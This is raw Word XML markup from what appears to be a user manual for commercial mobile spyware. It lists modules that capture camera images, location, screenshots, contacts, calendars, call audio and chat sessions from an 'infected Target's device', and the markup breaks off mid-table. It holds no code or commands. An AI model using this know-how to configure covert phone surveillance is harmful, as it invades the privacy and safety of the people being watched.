    <w:p w:rsidR="007703E3" w:rsidRDefault="007703E3" w:rsidP="008C6F2E">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc372642514"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Mobile Modules Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="007703E3" w:rsidRDefault="007703E3" w:rsidP="007703E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00942A81" w:rsidRDefault="00942A81" w:rsidP="00942A81">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Within a Mobile Factory there’re 18 different Modules available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942A81" w:rsidRDefault="00942A81" w:rsidP="00942A81">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Each Module represents a specific type of data that can be collected from the infected Target’s device, except 1 Module (Crisis) that do not provide any evidence and is used for different purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942A81" w:rsidRDefault="00942A81" w:rsidP="00942A81">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238"/>
        <w:gridCol w:w="8499"/>
      </w:tblGrid>
      <w:tr w:rsidR="00942A81" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1088" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId138" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1088" DrawAspect="Content" ObjectID="_1446455303" r:id="rId288"/>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Camera</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D056EB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Camera </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00D056EB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>odule captures image</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00D056EB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> from the built-in camera</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> of the infected Target’s device.</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089" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId140" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1089" DrawAspect="Content" ObjectID="_1446455304" r:id="rId289"/>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Device</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F80224">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Device </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00F80224">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records system information </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">from the infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00F80224">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">e.g. </w:t>
            </w:r>
            <w:r w:rsidRPr="00F80224">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">processor type, memory in use, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">O.S. </w:t>
            </w:r>
            <w:r w:rsidRPr="00F80224">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>installed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F80224">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>root privileges).</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090" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId142" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1090" DrawAspect="Content" ObjectID="_1446455305" r:id="rId290"/>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Position</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="00853FD1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00185EC8">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Position </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00185EC8">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s </w:t>
            </w:r>
            <w:r w:rsidRPr="00185EC8">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">device </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">geographic </w:t>
            </w:r>
            <w:r w:rsidRPr="00185EC8">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>position.</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091" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId144" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1091" DrawAspect="Content" ObjectID="_1446455306" r:id="rId291"/>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Screenshot</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE7ABA">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Screenshot </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE7ABA">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule captures the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE7ABA">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>screen image.</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092" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId146" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1092" DrawAspect="Content" ObjectID="_1446455307" r:id="rId292"/>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Addressbook</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="002E4473">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE1D66">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Addressbook </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE1D66">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records all the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">information founded within </w:t>
            </w:r>
            <w:r w:rsidR="00853FD1">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>device’s addressbook</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE1D66">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</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093" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId148" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1093" DrawAspect="Content" ObjectID="_1446455308" r:id="rId293"/>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Application</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000F2CBB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Application </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="000F2CBB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>odule records name</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="000F2CBB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> and information </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">about all </w:t>
            </w:r>
            <w:r w:rsidRPr="000F2CBB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">processes </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">started and stopped on </w:t>
            </w:r>
            <w:r w:rsidRPr="000F2CBB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected T</w:t>
            </w:r>
            <w:r w:rsidRPr="000F2CBB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>’s device.</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AA2C8D" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1094" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId294" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1094" DrawAspect="Content" ObjectID="_1446455309" r:id="rId295"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="0005662C" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0005662C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Calendar</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00FF4166" w:rsidP="00FF4166">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF4166">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Calendar </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF4166">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records all the information found in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>device’s calendar.</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095" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId150" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1095" DrawAspect="Content" ObjectID="_1446455310" r:id="rId296"/>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Call</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7300">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Call </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="004C7300">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>odule captures audio and information (start time, length, caller and called numbers) for</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> a</w:t>
            </w:r>
            <w:r w:rsidRPr="004C7300">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ll</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004C7300">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">calls made and received by the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected T</w:t>
            </w:r>
            <w:r w:rsidRPr="004C7300">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>’s device</w:t>
            </w:r>
            <w:r w:rsidRPr="004C7300">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F0B7A" w:rsidRPr="006172B5" w:rsidTr="001F6D35">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001F0B7A" w:rsidRPr="006172B5" w:rsidRDefault="001F0B7A" w:rsidP="001F6D35">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001F0B7A" w:rsidRPr="006172B5" w:rsidRDefault="001F0B7A" w:rsidP="001F6D35">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001F0B7A" w:rsidRPr="006172B5" w:rsidRDefault="001F0B7A" w:rsidP="001F6D35">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F0B7A" w:rsidRPr="005701FD" w:rsidTr="001F6D35">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="001F0B7A" w:rsidRPr="005701FD" w:rsidRDefault="001F0B7A" w:rsidP="001F6D35">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="001F0B7A" w:rsidRPr="005701FD" w:rsidRDefault="001F0B7A" w:rsidP="001F6D35">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="001F0B7A" w:rsidRPr="005701FD" w:rsidRDefault="001F0B7A" w:rsidP="001F6D35">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942A81">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="005701FD" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="005701FD" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="005701FD" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00942A81" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
                <v:shape id="_x0000_i1096" type="#_x0000_t75" style="width:33.75pt;height:33.75pt" o:ole="">
                  <v:imagedata r:id="rId152" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1096" DrawAspect="Content" ObjectID="_1446455311" r:id="rId297"/>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Chat</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00942A81" w:rsidRPr="00671455" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A540B3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Chat </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidRPr="00A540B3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">odule records </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>the entire chat sessions on the infected Target’s device.</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1F0B7A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="005701FD" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="238" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="005701FD" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRPr="005701FD" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00942A81" w:rsidTr="006311A1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00942A81" w:rsidRDefault="00942A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="675" w:dyaOrig="675">
